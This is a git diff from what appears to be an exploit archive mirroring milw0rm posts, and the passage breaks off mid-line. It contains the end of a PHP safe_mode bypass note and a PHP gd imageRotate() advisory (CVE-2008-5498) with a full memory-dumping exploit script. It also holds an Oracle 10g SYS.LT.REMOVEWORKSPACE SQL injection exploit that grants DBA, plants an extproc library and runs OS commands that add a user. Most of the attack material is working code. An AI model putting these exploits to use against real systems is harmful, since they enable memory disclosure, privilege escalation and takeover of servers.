+PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl +with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web +developers to write dynamically generated pages quickly. + +error_log + +They allow you to define your own error handling rules, as well as modify the way the errors can +be logged. This allows you to change and enhance error reporting to suit your needs. + +- --- 0. error_log const. bypassed by php_admin_flag --- +The main problem is between using safe_mode in global mode + +php.ini­: +safe_mode = On + +and declaring via php_admin_flag + + +... + php_admin_flag safe_mode On + + +When we create some php script in /www/ and try call to: + +ini_set("error_log", "/hack/"); + +or in /www/.htaccess + +php_value error_log "/hack/bleh.php" + + +Result: + +Warning: Unknown: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in Unknown on line 0 + +Warning: ini_set() [function.ini-set]: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in /www/phpinfo.php on line 4 + + +It was for safe_mode declared in php.ini. But if we use + +php_admin_flag safe_mode On + +in httpd.conf, we will get only + +Warning: ini_set() [function.ini-set]: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in /www/phpinfo.php on line 4 + +syntax in .htaccess + +php_value error_log "/hack/blehx.php" + +is allowed and bypass safe_mode. + +example exploit: +error_log("", 0); + +- --- 2. How to fix --- +Fixed in CVS + +http://cvs.php.net/viewvc.cgi/php-src/NEWS?revision=1.2027.2.547.2.1315&view=markup + +Note: +Do not use safe_mode as a main safety. + + --- 3. Greets --- +sp3x Infospec schain p_e_a pi3 + +- --- 4. Contact --- +Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ] +Email: cxib [at] securityreason [dot] com +GPG: http://securityreason.pl/key/Arciemowicz.Maksymilian.gpg +http://securityreason.com +http://securityreason.pl + +# milw0rm.com [2008-11-20] diff --git a/platforms/multiple/local/7503.txt b/platforms/multiple/local/7503.txt index 4fac52e9d..c632647b5 100755 --- a/platforms/multiple/local/7503.txt +++ b/platforms/multiple/local/7503.txt @@ -1,23 +1,23 @@ - - -# milw0rm.com [2008-12-17] + + +# milw0rm.com [2008-12-17] diff --git a/platforms/multiple/local/7646.txt b/platforms/multiple/local/7646.txt index 55aae2764..93b59b2ca 100755 --- a/platforms/multiple/local/7646.txt +++ b/platforms/multiple/local/7646.txt @@ -1,376 +1,376 @@ -PHP - gd library - imageRotate()function Information Leak Vulnerability - -Discovered by: Hamid Ebadi, -Further research and exploit: Mohammad R. Roohian -CSIRT Team Members -Amirkabir University APA Laboratory - -Introduction -PHP is a popular web programming language which isnormally used as a script engine in the server side. -PHP 5 which is compiledwith gd library, includes a function called imageRotate() for rotating an imageresource by giving the rotation angle. -This function fills the resulted emptyareas with a given default coloring after rotation (clrBack). -Gd library works with both indexed images andtruecolor images. A truecolor pixel is a DWORD which stores the color value ofthe pixel which would be displayed without any change. -In indexed mode by using an index with a sizeof no more than 1 byte, the data wouldbe fetched from a color palette which consists of parallel arrays of colorbytes. The gd library uses the same data strcture for both of these image types(gdImageStruct). -An implementation error can cause information leakage from thememory of the PHP (or possible the web server) process. - -Information leak vulnerabilities allow access to e.g. the Apache memory which might contain the private RSA key for the SSL cert.If an attacker is able to read it he can perform real man in the middle attackson all SSL connections. Aside from this in the days of ASLR, NX and canaryprotections it is often vital for the success of the exploit to know exactmemory addresses. (http://www.php-security.org/) - -Vulnerableversion -PHP <= 5.2.8 -CVE Candidate Number: CVE-2008-5498 - -Vulnerability -The imageRotate() function does not perform any validation check on the clrBack parameter which is used as an index for the above mentioned arrays with the size of 255 in the index image type. -A correct validation check for the indexed images could be: - -file: php-x.y.z/ext/gd/libgd/gd.c - -3129: gdImagePtr gdImageRotate (gdImagePtrsrc, double dAngle, - int clrBack, int ignoretransparent) -3130:{ -3131: gdImagePtrpMidImg; -3132: gdImagePtrrotatedImg; -3133: -3134: if(src == NULL) { -3135: returnNULL; -3136: } -3137:+ -3137:+ // Index check -3137:+ if (!src->truecolor) -3137:+ clrBack &= 0xff; // Just keep the first byte -3137:+ -3138: if(!gdImageTrueColor(src) && clrBack>=gdImageColorsTotal(src)) { -3139: returnNULL; -3140: } - -While rotating indexed image, gd retrives the final backcolor from 4 parallel arrays(red, green, blue and alpha) with length of 255 and uses clrBack as the indexof these arrays. -By providing a special clrBack value (more than 255) we can read almost any address in php memory: - -file: php-x.y.z/ext/gd/libgd/gd.h - -typedef struct gdImageStruct { - - --snip snip -- - - intred[gdMaxColors]; - intgreen[gdMaxColors]; - intblue[gdMaxColors]; - - --snip snip -- - - intalpha[gdMaxColors]; - /*Truecolor flag and pixels. New 2.0 fields appear here at the - endto minimize breakage of existing object code. */ - inttrueColor; - - --snip snip -- - -} gdImage; - -typedef gdImage * gdImagePtr; - -then uses gdTrueColorAlpha macro to combinethe 4 mentioned values. gdTrueColorAlpha macro is implemented as following: - -file: php-x.y.z/ext/gd/libgd/gd.h - -#define gdTrueColorAlpha(r, g, b, a) (((a)<< 24) + \ - ((r)<< 16) + \ - ((g)<< 8) + \ - (b)) - -The final color value is the output of gdTrueColorAlpha macro which will be used as background color. gdTrueColorAlpha uses '+' (add) instead of '&'(and). While the '+' operator is slower, it also causes a security issue. By using a reverse function we can calculate almost any desired memory address. - -Proof of concept: -This script would cause a segmentation faultbecause -9999999 would result in reading an invalid memory address in PHP process: - - -Exploitation : -We need to provide a good clrBack to imageRotate()and then calculate the value of desired memory address by using imagecolorat() with arguments concerned with angles of the rotated image. Upper right would be a good spot (0, 0): - - - - - -------- -|f_b/\ | -| / \ | -| / \ | -|/image \| -|\ /| -| \ / | -| \ / | -| \/ | - -------- - -To read encoded memory values from a desired address, we have to use the following script: - - - -After passing $index_b as the index of arrays (red, green, blue and alphaarrays) and rotating $img (so that the values from the memory would be read), b variable takes the value of $address. -The color at [0,0] would be filled by back color,thus $f_b has the return value of gdTrueColorAlpha function. All we need to do is decoding its value. The final value of $f_b is calculated as following: -$f_b = gdTrueColorAlpha( M[$address-512], - M[$address-255], - M[$address+0], - M[$address+1034]); - -These offsets [-512, -255, 0, 1034] are the displacements in gdImageStruct's arrays. -Decoding $f_b -As you can see in the source code $f_b is calculated like this: ----------------------------------------------------------- -a :A4 A3 A2 A1 -r : R4 R3 R2 R1 -g : G4 G3 G2 G1 -b : B4 B3 B2 B1 ----------------------------------------------------------- -$f_b : F4 F3 F2 F1 ----------------------------------------------------------- - -We have used a special $index_b in order that b would have the value of memory address at $address. All we need to do is extracting b from $f_b. It is obvious that F1 has the exact value of B1( first byte of memory at $address location). To extract B2 we must have G1 values and use this equation: B2 = F2 – G1. -To calculate B3 and B4 we will also need G2, G3, R1, R2, A1. These bytes values can also be grabbed by using imagerotate function and sending special indexes other than $index_b. For more information see the comments in exploit source code. - - - -Exploit: -: mov 0x10(%edi,%esi,4),%ebx -mov ebx, [edi+esi*4+10] - -test case: -edi = 0x084c6128 -esi = 0xffee07b1(-1177679) values less than this will crash. -=> -ebx = 0x8047ff6 - -if (a>127) { - a = 127; -} -:( since alpha blending is on by default, the 32th bit of dumped address cant be detected. -*/ -$debug = 0; -$address = hexdec($argv[1]); -$addressSave = $address; -$count = $argv[3]+1; -$mode = $argv[2]; -$src = 0x84cde2c; -$s = 10; //image size - -$GLOBALS["image"]=imagecreate($s,$s); -$r = $GLOBALS["image"]; -if( $debug ) - echo "Image created.\n"; - -function getDataFromImage( $index ) { - $tmp = imagerotate ($GLOBALS["image"],5,$index); - return imagecolorat( $tmp, 0,0); -} - -$eor = 0; -while( $address < $addressSave+$count*4 ) { - // indexes - $index_b = (int)(($src - $address + 0x810)/4); - $index_g = $index_b + 256; - $index_r = $index_b + 512; - $index_a = $index_b - 1034; - //$index_gG is the same as index of r - $index_gR = $index_g + 512; - //$index_rG is the same as index of gR - //$index_gGg is the same as index of gR - - // fuctions - $f_b = getDataFromImage( -$index_b ); - $f_g = getDataFromImage( -$index_g ); - $f_r = getDataFromImage( -$index_r ); - $f_a = getDataFromImage( -$index_a ); - $f_gR = getDataFromImage( -$index_gR ); - - /********************* Byte 1 **********************/ - - // b byte 1 - $byte_b1 = $f_b & 0x000000ff; - if( $debug ) - printf( "b:1-0x%x\n", $byte_b1 ); - - //g byte 1 - $byte_g1 = $f_g & 0x000000ff; - if( $debug ) - printf( "g:1-0x%x\n", $byte_g1 ); - - //r byte 1 - $byte_r1 = $f_r& 0x000000ff; - if( $debug ) - printf( "r:1-0x%x\n", $byte_r1 ); - - //a byte 1 - $byte_a1 = $f_a & 0x000000ff; - if( $debug ) - printf( "a:1-0x%x\n\n", $byte_a1 ); - - /* Relative */ - - // gG byte 1 - // this is relative g to `g`( suppose that 'g' is a b). so its right at the position of r. - $byte_gG1 = $byte_r1; - - // gR byte 1 - // this is relative r to `g`( suppose that 'g' is a b) - $byte_gR1 = $f_gR & 0x000000ff; - - // rG byte 1 - // this is relative g to r( suppose that 'r' is a b) - $byte_rG1 = $byte_gR1; - - /* 2 Level Relative */ - - // gGg byte 1 - // this is relative g to `gG`( suppose that 'gG' is a b) - $byte_gGg1 = $byte_gR1; - - /********************* Byte 2 **********************/ - - // b byte 2 - $sum_b2_g1 = (($f_b & 0x0000ff00) >> 8 ); - $byte_b2 = $sum_b2_g1 - $byte_g1; - $borrow_b2 = 0; - if( $byte_b2 < 0 ) - $borrow_b2 = 1; - $byte_b2 = $byte_b2 & 0x000000ff; - if( $debug ) - printf( "b:2-0x%x \t0x%x\n", $byte_b2, $f_b ); - - // g byte 2 - $sum_g2_gG1 = (($f_g & 0x0000ff00) >> 8 ); - $byte_g2 = $sum_g2_gG1 - $byte_gG1; - $borrow_g2 = 0; - if( $byte_g2 < 0 ) - $borrow_g2 = 1; - $byte_g2 = $byte_g2 & 0x000000ff; - if( $debug ) - printf( "g:2-0x%x \t0x%x\n", $byte_g2, $f_gG1 ); - - // r byte 2 - $sum_r2_rG1 = (($f_r& 0x0000ff00) >> 8 ); - $byte_r2 = $sum_r2_rG1 - $byte_rG1; - $byte_r2 = $byte_r2 & 0x000000ff; - if( $debug ) - printf( "r:2-0x%x \t0x%x\n\n", $byte_r2, $sum_r2_rG1 ); - - /* Relative */ - - // gG byte 2 - $byte_gG2 = $byte_r2; - - /********************* Byte 3 **********************/ - - // b byte 3 - $sum_b3_g2_r1_br2 = (($f_b & 0x00ff0000) >> 16 ); - $sum_b3_g2_r1 = $sum_b3_g2_r1_br2 - $borrow_b2; - $sum_b3_g2 = $sum_b3_g2_r1 - $byte_r1; - $byte_b3 = $sum_b3_g2 - $byte_g2; - $borrow_b3 = 0; - if( $byte_b3 < 0 ) - { - $borrow_b3 = (int)(-$byte_b3 / 0xff) + 1; // for borrows more than one - if( $debug ) - printf( "\nborrow was: %d\n" , $borrow_b3 ); - } - $byte_b3 = $byte_b3 & 0x000000ff; - if( $debug ) - printf( "b:3-0x%x \t0x%x\n", $byte_b3, $sum_b3_g2 ); - - // g byte 3 - $sum_g3_gG2_gR1_br2 = (($f_g & 0x00ff0000) >> 16 ); - $sum_g3_gG2_gR1 = $sum_g3_gG2_gR1_br2 - $borrow_g2; - $sum_g3_gG2 = $sum_g3_gG2_gR1 - $byte_gR1; - $byte_g3 = $sum_g3_gG2 - $byte_gG2; - $byte_g3 = $byte_g3 & 0x000000ff; - if( $debug ) { - printf( "f_g: 0x%x\n" , $f_g); - printf( "sum_g3_gG2_gR1_br2: 0x%x\n" , $sum_g3_gG2_gR1_br2 ); - printf( "sum_g3_gG2_gR1: 0x%x\n" , $sum_g3_gG2_gR1 ); - printf( "sum_g3_gG2: 0x%x\n" , $sum_g3_gG2 ); - printf( "g:3-0x%x \t0x%x\n\n", $byte_g3, $sum_b3_g2 ); - } - - /********************* Byte 4 **********************/ - - // b byte 4 - $sum_b4_g3_r2_a1_br3 = (($f_b & 0xff000000) >> 24 ); - $sum_b4_g3_r2_a1 = $sum_b4_g3_r2_a1_br3 - $borrow_b3; - $sum_b4_g3_r2 = $sum_b4_g3_r2_a1 - $byte_a1; - $sum_b4_g3 = $sum_b4_g3_r2 - $byte_r2; - $byte_b4 = $sum_b4_g3 - $byte_g3; - $byte_b4 = $byte_b4 & 0x000000ff; - if( $debug ) { - printf( "f_b: 0x%x\n" , $f_b); - printf( "sum_b4_g3_r2_a1_br3: 0x%x\n" , $sum_b4_g3_r2_a1_br3 ); - printf( "sum_b4_g3_r2_a1: 0x%x\n" , $sum_b4_g3_r2_a1 ); - printf( "sum_b4_g3_r2: 0x%x\n" , $sum_b4_g3_r2 ); - printf( "sum_b4_g3: 0x%x\n" , $sum_b4_g3 ); - printf( "b:4-0x%x\n\n", $byte_b4); - } - /********************* Byte **********************/ - - if($mode == 0) { //text mode - printf( "%c%c%c%c", $byte_b1, $byte_b2, $byte_b3, $byte_b4); - } elseif( $mode == 1) { - // b - if( !$eor ) - printf( "0x%x:\t", $address ); - printf( "0x%x(%c)\t0x%x(%c)\t0x%x(%c)\t0x%x(%c)\t", $byte_b1, $byte_b1, - $byte_b2, $byte_b2, - $byte_b3, $byte_b3, - $byte_b4, $byte_b4 ); - - $eor = !$eor; - if( !$eor ) - echo "\n"; - } else { - $val = ($byte_b4 << 24) + ($byte_b3 << 16) + ($byte_b2 << 8) + $byte_b1; - printf( "0x%x: 0x%x\n", $address, $val ); - } - $address+=4; -} -?> - -Credit -This vulnerability has been discovered by Hamid Ebadi from Amirkabir University of Technology APA laboratory. -autcert@aut.ac.ir -https://www.ircert.cc - -Disclosure: October 2008 -Report to vendor: December, 10, 2008 - -# milw0rm.com [2009-01-02] +PHP - gd library - imageRotate()function Information Leak Vulnerability + +Discovered by: Hamid Ebadi, +Further research and exploit: Mohammad R. Roohian +CSIRT Team Members +Amirkabir University APA Laboratory + +Introduction +PHP is a popular web programming language which isnormally used as a script engine in the server side. +PHP 5 which is compiledwith gd library, includes a function called imageRotate() for rotating an imageresource by giving the rotation angle. +This function fills the resulted emptyareas with a given default coloring after rotation (clrBack). +Gd library works with both indexed images andtruecolor images. A truecolor pixel is a DWORD which stores the color value ofthe pixel which would be displayed without any change. +In indexed mode by using an index with a sizeof no more than 1 byte, the data wouldbe fetched from a color palette which consists of parallel arrays of colorbytes. The gd library uses the same data strcture for both of these image types(gdImageStruct). +An implementation error can cause information leakage from thememory of the PHP (or possible the web server) process. + +Information leak vulnerabilities allow access to e.g. the Apache memory which might contain the private RSA key for the SSL cert.If an attacker is able to read it he can perform real man in the middle attackson all SSL connections. Aside from this in the days of ASLR, NX and canaryprotections it is often vital for the success of the exploit to know exactmemory addresses. (http://www.php-security.org/) + +Vulnerableversion +PHP <= 5.2.8 +CVE Candidate Number: CVE-2008-5498 + +Vulnerability +The imageRotate() function does not perform any validation check on the clrBack parameter which is used as an index for the above mentioned arrays with the size of 255 in the index image type. +A correct validation check for the indexed images could be: + +file: php-x.y.z/ext/gd/libgd/gd.c + +3129: gdImagePtr gdImageRotate (gdImagePtrsrc, double dAngle, + int clrBack, int ignoretransparent) +3130:{ +3131: gdImagePtrpMidImg; +3132: gdImagePtrrotatedImg; +3133: +3134: if(src == NULL) { +3135: returnNULL; +3136: } +3137:+ +3137:+ // Index check +3137:+ if (!src->truecolor) +3137:+ clrBack &= 0xff; // Just keep the first byte +3137:+ +3138: if(!gdImageTrueColor(src) && clrBack>=gdImageColorsTotal(src)) { +3139: returnNULL; +3140: } + +While rotating indexed image, gd retrives the final backcolor from 4 parallel arrays(red, green, blue and alpha) with length of 255 and uses clrBack as the indexof these arrays. +By providing a special clrBack value (more than 255) we can read almost any address in php memory: + +file: php-x.y.z/ext/gd/libgd/gd.h + +typedef struct gdImageStruct { + + --snip snip -- + + intred[gdMaxColors]; + intgreen[gdMaxColors]; + intblue[gdMaxColors]; + + --snip snip -- + + intalpha[gdMaxColors]; + /*Truecolor flag and pixels. New 2.0 fields appear here at the + endto minimize breakage of existing object code. */ + inttrueColor; + + --snip snip -- + +} gdImage; + +typedef gdImage * gdImagePtr; + +then uses gdTrueColorAlpha macro to combinethe 4 mentioned values. gdTrueColorAlpha macro is implemented as following: + +file: php-x.y.z/ext/gd/libgd/gd.h + +#define gdTrueColorAlpha(r, g, b, a) (((a)<< 24) + \ + ((r)<< 16) + \ + ((g)<< 8) + \ + (b)) + +The final color value is the output of gdTrueColorAlpha macro which will be used as background color. gdTrueColorAlpha uses '+' (add) instead of '&'(and). While the '+' operator is slower, it also causes a security issue. By using a reverse function we can calculate almost any desired memory address. + +Proof of concept: +This script would cause a segmentation faultbecause -9999999 would result in reading an invalid memory address in PHP process: + + +Exploitation : +We need to provide a good clrBack to imageRotate()and then calculate the value of desired memory address by using imagecolorat() with arguments concerned with angles of the rotated image. Upper right would be a good spot (0, 0): + + + + + -------- +|f_b/\ | +| / \ | +| / \ | +|/image \| +|\ /| +| \ / | +| \ / | +| \/ | + -------- + +To read encoded memory values from a desired address, we have to use the following script: + + + +After passing $index_b as the index of arrays (red, green, blue and alphaarrays) and rotating $img (so that the values from the memory would be read), b variable takes the value of $address. +The color at [0,0] would be filled by back color,thus $f_b has the return value of gdTrueColorAlpha function. All we need to do is decoding its value. The final value of $f_b is calculated as following: +$f_b = gdTrueColorAlpha( M[$address-512], + M[$address-255], + M[$address+0], + M[$address+1034]); + +These offsets [-512, -255, 0, 1034] are the displacements in gdImageStruct's arrays. +Decoding $f_b +As you can see in the source code $f_b is calculated like this: +---------------------------------------------------------- +a :A4 A3 A2 A1 +r : R4 R3 R2 R1 +g : G4 G3 G2 G1 +b : B4 B3 B2 B1 +---------------------------------------------------------- +$f_b : F4 F3 F2 F1 +---------------------------------------------------------- + +We have used a special $index_b in order that b would have the value of memory address at $address. All we need to do is extracting b from $f_b. It is obvious that F1 has the exact value of B1( first byte of memory at $address location). To extract B2 we must have G1 values and use this equation: B2 = F2 – G1. +To calculate B3 and B4 we will also need G2, G3, R1, R2, A1. These bytes values can also be grabbed by using imagerotate function and sending special indexes other than $index_b. For more information see the comments in exploit source code. + + + +Exploit: +: mov 0x10(%edi,%esi,4),%ebx +mov ebx, [edi+esi*4+10] + +test case: +edi = 0x084c6128 +esi = 0xffee07b1(-1177679) values less than this will crash. +=> +ebx = 0x8047ff6 + +if (a>127) { + a = 127; +} +:( since alpha blending is on by default, the 32th bit of dumped address cant be detected. +*/ +$debug = 0; +$address = hexdec($argv[1]); +$addressSave = $address; +$count = $argv[3]+1; +$mode = $argv[2]; +$src = 0x84cde2c; +$s = 10; //image size + +$GLOBALS["image"]=imagecreate($s,$s); +$r = $GLOBALS["image"]; +if( $debug ) + echo "Image created.\n"; + +function getDataFromImage( $index ) { + $tmp = imagerotate ($GLOBALS["image"],5,$index); + return imagecolorat( $tmp, 0,0); +} + +$eor = 0; +while( $address < $addressSave+$count*4 ) { + // indexes + $index_b = (int)(($src - $address + 0x810)/4); + $index_g = $index_b + 256; + $index_r = $index_b + 512; + $index_a = $index_b - 1034; + //$index_gG is the same as index of r + $index_gR = $index_g + 512; + //$index_rG is the same as index of gR + //$index_gGg is the same as index of gR + + // fuctions + $f_b = getDataFromImage( -$index_b ); + $f_g = getDataFromImage( -$index_g ); + $f_r = getDataFromImage( -$index_r ); + $f_a = getDataFromImage( -$index_a ); + $f_gR = getDataFromImage( -$index_gR ); + + /********************* Byte 1 **********************/ + + // b byte 1 + $byte_b1 = $f_b & 0x000000ff; + if( $debug ) + printf( "b:1-0x%x\n", $byte_b1 ); + + //g byte 1 + $byte_g1 = $f_g & 0x000000ff; + if( $debug ) + printf( "g:1-0x%x\n", $byte_g1 ); + + //r byte 1 + $byte_r1 = $f_r& 0x000000ff; + if( $debug ) + printf( "r:1-0x%x\n", $byte_r1 ); + + //a byte 1 + $byte_a1 = $f_a & 0x000000ff; + if( $debug ) + printf( "a:1-0x%x\n\n", $byte_a1 ); + + /* Relative */ + + // gG byte 1 + // this is relative g to `g`( suppose that 'g' is a b). so its right at the position of r. + $byte_gG1 = $byte_r1; + + // gR byte 1 + // this is relative r to `g`( suppose that 'g' is a b) + $byte_gR1 = $f_gR & 0x000000ff; + + // rG byte 1 + // this is relative g to r( suppose that 'r' is a b) + $byte_rG1 = $byte_gR1; + + /* 2 Level Relative */ + + // gGg byte 1 + // this is relative g to `gG`( suppose that 'gG' is a b) + $byte_gGg1 = $byte_gR1; + + /********************* Byte 2 **********************/ + + // b byte 2 + $sum_b2_g1 = (($f_b & 0x0000ff00) >> 8 ); + $byte_b2 = $sum_b2_g1 - $byte_g1; + $borrow_b2 = 0; + if( $byte_b2 < 0 ) + $borrow_b2 = 1; + $byte_b2 = $byte_b2 & 0x000000ff; + if( $debug ) + printf( "b:2-0x%x \t0x%x\n", $byte_b2, $f_b ); + + // g byte 2 + $sum_g2_gG1 = (($f_g & 0x0000ff00) >> 8 ); + $byte_g2 = $sum_g2_gG1 - $byte_gG1; + $borrow_g2 = 0; + if( $byte_g2 < 0 ) + $borrow_g2 = 1; + $byte_g2 = $byte_g2 & 0x000000ff; + if( $debug ) + printf( "g:2-0x%x \t0x%x\n", $byte_g2, $f_gG1 ); + + // r byte 2 + $sum_r2_rG1 = (($f_r& 0x0000ff00) >> 8 ); + $byte_r2 = $sum_r2_rG1 - $byte_rG1; + $byte_r2 = $byte_r2 & 0x000000ff; + if( $debug ) + printf( "r:2-0x%x \t0x%x\n\n", $byte_r2, $sum_r2_rG1 ); + + /* Relative */ + + // gG byte 2 + $byte_gG2 = $byte_r2; + + /********************* Byte 3 **********************/ + + // b byte 3 + $sum_b3_g2_r1_br2 = (($f_b & 0x00ff0000) >> 16 ); + $sum_b3_g2_r1 = $sum_b3_g2_r1_br2 - $borrow_b2; + $sum_b3_g2 = $sum_b3_g2_r1 - $byte_r1; + $byte_b3 = $sum_b3_g2 - $byte_g2; + $borrow_b3 = 0; + if( $byte_b3 < 0 ) + { + $borrow_b3 = (int)(-$byte_b3 / 0xff) + 1; // for borrows more than one + if( $debug ) + printf( "\nborrow was: %d\n" , $borrow_b3 ); + } + $byte_b3 = $byte_b3 & 0x000000ff; + if( $debug ) + printf( "b:3-0x%x \t0x%x\n", $byte_b3, $sum_b3_g2 ); + + // g byte 3 + $sum_g3_gG2_gR1_br2 = (($f_g & 0x00ff0000) >> 16 ); + $sum_g3_gG2_gR1 = $sum_g3_gG2_gR1_br2 - $borrow_g2; + $sum_g3_gG2 = $sum_g3_gG2_gR1 - $byte_gR1; + $byte_g3 = $sum_g3_gG2 - $byte_gG2; + $byte_g3 = $byte_g3 & 0x000000ff; + if( $debug ) { + printf( "f_g: 0x%x\n" , $f_g); + printf( "sum_g3_gG2_gR1_br2: 0x%x\n" , $sum_g3_gG2_gR1_br2 ); + printf( "sum_g3_gG2_gR1: 0x%x\n" , $sum_g3_gG2_gR1 ); + printf( "sum_g3_gG2: 0x%x\n" , $sum_g3_gG2 ); + printf( "g:3-0x%x \t0x%x\n\n", $byte_g3, $sum_b3_g2 ); + } + + /********************* Byte 4 **********************/ + + // b byte 4 + $sum_b4_g3_r2_a1_br3 = (($f_b & 0xff000000) >> 24 ); + $sum_b4_g3_r2_a1 = $sum_b4_g3_r2_a1_br3 - $borrow_b3; + $sum_b4_g3_r2 = $sum_b4_g3_r2_a1 - $byte_a1; + $sum_b4_g3 = $sum_b4_g3_r2 - $byte_r2; + $byte_b4 = $sum_b4_g3 - $byte_g3; + $byte_b4 = $byte_b4 & 0x000000ff; + if( $debug ) { + printf( "f_b: 0x%x\n" , $f_b); + printf( "sum_b4_g3_r2_a1_br3: 0x%x\n" , $sum_b4_g3_r2_a1_br3 ); + printf( "sum_b4_g3_r2_a1: 0x%x\n" , $sum_b4_g3_r2_a1 ); + printf( "sum_b4_g3_r2: 0x%x\n" , $sum_b4_g3_r2 ); + printf( "sum_b4_g3: 0x%x\n" , $sum_b4_g3 ); + printf( "b:4-0x%x\n\n", $byte_b4); + } + /********************* Byte **********************/ + + if($mode == 0) { //text mode + printf( "%c%c%c%c", $byte_b1, $byte_b2, $byte_b3, $byte_b4); + } elseif( $mode == 1) { + // b + if( !$eor ) + printf( "0x%x:\t", $address ); + printf( "0x%x(%c)\t0x%x(%c)\t0x%x(%c)\t0x%x(%c)\t", $byte_b1, $byte_b1, + $byte_b2, $byte_b2, + $byte_b3, $byte_b3, + $byte_b4, $byte_b4 ); + + $eor = !$eor; + if( !$eor ) + echo "\n"; + } else { + $val = ($byte_b4 << 24) + ($byte_b3 << 16) + ($byte_b2 << 8) + $byte_b1; + printf( "0x%x: 0x%x\n", $address, $val ); + } + $address+=4; +} +?> + +Credit +This vulnerability has been discovered by Hamid Ebadi from Amirkabir University of Technology APA laboratory. +autcert@aut.ac.ir +https://www.ircert.cc + +Disclosure: October 2008 +Report to vendor: December, 10, 2008 + +# milw0rm.com [2009-01-02] diff --git a/platforms/multiple/local/7675.txt b/platforms/multiple/local/7675.txt index 3ff06d3b2..af1b923fd 100755 --- a/platforms/multiple/local/7675.txt +++ b/platforms/multiple/local/7675.txt @@ -1,75 +1,75 @@ -/*********************************************************/ -/*Oracle 10g SYS.LT.REMOVEWORKSPACE SQL Injection Exploit*/ -/****grant DBA and create new OS user (advanced extproc)*/ -/*********************************************************/ -/***********exploit grant DBA to scott********************/ -/***********and execute OS command "net user"*************/ -/***********using advanced extproc method*****************/ -/*********************************************************/ -/***********tested on oracle 10.1.0.5.0*******************/ -/*********************************************************/ -/*********************************************************/ -/* Date of Public EXPLOIT: January 6, 2009 */ -/* Written by: Alexandr "Sh2kerr" Polyakov */ -/* email: Alexandr.Polyakov@dsec.ru */ -/* site: http://www.dsecrg.ru */ -/* http://www.dsec.ru */ -/*********************************************************/ -/*Original Advisory: */ -/*Esteban Martinez Fayo [Team SHATTER ] */ -/*Date of Public Advisory: November 11, 2008 */ -/*http://www.appsecinc.com/resources/alerts/oracle/2008-10.shtml*/ -/*********************************************************/ - - -select * from user_role_privs; - -CREATE OR REPLACE FUNCTION X return varchar2 -authid current_user as -pragma autonomous_transaction; -BEGIN -EXECUTE IMMEDIATE 'GRANT DBA TO SCOTT'; -EXECUTE IMMEDIATE 'GRANT CREATE ANY DIRECTORY TO SCOTT'; -EXECUTE IMMEDIATE 'GRANT CREATE ANY LIBRARY TO SCOTT'; -EXECUTE IMMEDIATE 'GRANT EXECUTE ON SYS.DBMS_FILE_TRANSFER TO SCOTT'; -COMMIT; -RETURN 'X'; -END; -/ - -exec SYS.LT.CREATEWORKSPACE('sh2kerr'' and SCOTT.X()=''X'); -exec SYS.LT.REMOVEWORKSPACE('sh2kerr'' and SCOTT.X()=''X'); - -/* bypassing extproc limitation by copying msvcrt.dll to $ORACLE_HOME\BIN */ -/* this method works in 10g and 11g database versions with updates */ - -CREATE OR REPLACE DIRECTORY copy_dll_from AS 'C:\Windows\system32'; -CREATE OR REPLACE DIRECTORY copy_dll_to AS 'C:\Oracle\product\10.1.0\db_1\BIN'; - -BEGIN - SYS.DBMS_FILE_TRANSFER.COPY_FILE( - source_directory_object => 'copy_dll_from', - source_file_name => 'msvcrt.dll', - destination_directory_object => 'copy_dll_to', - destination_file_name => 'msvcrt.dll'); -END; -/ - -CREATE OR REPLACE LIBRARY extproc_shell AS 'C:\Oracle\product\10.1.0\db_1\bin\msvcrt.dll'; -/ - -CREATE OR REPLACE PROCEDURE extprocexec (cmdstring IN CHAR) -IS EXTERNAL -NAME "system" -LIBRARY extproc_shell -LANGUAGE C; -/ - -/* here we can paste any OS command for example create new user */ - -EXEC extprocexec('net user hack 12345 /add'); -/ - -select * from user_role_privs; - -// milw0rm.com [2009-01-06] +/*********************************************************/ +/*Oracle 10g SYS.LT.REMOVEWORKSPACE SQL Injection Exploit*/ +/****grant DBA and create new OS user (advanced extproc)*/ +/*********************************************************/ +/***********exploit grant DBA to scott********************/ +/***********and execute OS command "net user"*************/ +/***********using advanced extproc method*****************/ +/*********************************************************/ +/***********tested on oracle 10.1.0.5.0*******************/ +/*********************************************************/ +/*********************************************************/ +/* Date of Public EXPLOIT: January 6, 2009 */ +/* Written by: Alexandr "Sh2kerr" Polyakov */ +/* email: Alexandr.Polyakov@dsec.ru */ +/* site: http://www.dsecrg.ru */ +/* http://www.dsec.ru */ +/*********************************************************/ +/*Original Advisory: */ +/*Esteban Martinez Fayo [Team SHATTER ] */ +/*Date of Public Advisory: November 11, 2008 */ +/*http://www.appsecinc.com/resources/alerts/oracle/2008-10.shtml*/ +/*********************************************************/ + + +select * from user_role_privs; + +CREATE OR REPLACE FUNCTION X return varchar2 +authid current_user as +pragma autonomous_transaction; +BEGIN +EXECUTE IMMEDIATE 'GRANT DBA TO SCOTT'; +EXECUTE IMMEDIATE 'GRANT CREATE ANY DIRECTORY TO SCOTT'; +EXECUTE IMMEDIATE 'GRANT CREATE ANY LIBRARY TO SCOTT'; +EXECUTE IMMEDIATE 'GRANT EXECUTE ON SYS.DBMS_FILE_TRANSFER TO SCOTT'; +COMMIT; +RETURN 'X'; +END; +/ + +exec SYS.LT.CREATEWORKSPACE('sh2kerr'' and SCOTT.X()=''X'); +exec SYS.LT.REMOVEWORKSPACE('sh2kerr'' and SCOTT.X()=''X'); + +/* bypassing extproc limitation by copying msvcrt.dll to $ORACLE_HOME\BIN */ +/* this method works in 10g and 11g database versions with updates */ + +CREATE OR REPLACE DIRECTORY copy_dll_from AS 'C:\Windows\system32'; +CREATE OR REPLACE DIRECTORY copy_dll_to AS 'C:\Oracle\product\10.1.0\db_1\BIN'; + +BEGIN + SYS.DBMS_FILE_TRANSFER.COPY_FILE( + source_directory_object => 'copy_dll_from', + source_file_name => 'msvcrt.dll', + destination_directory_object => 'copy_dll_to', + destination_file_name => 'msvcrt.dll'); +END; +/ + +CREATE OR REPLACE LIBRARY extproc_shell AS 'C:\Oracle\product\10.1.0\db_1\bin\msvcrt.dll'; +/ + +CREATE OR REPLACE PROCEDURE extprocexec (cmdstring IN 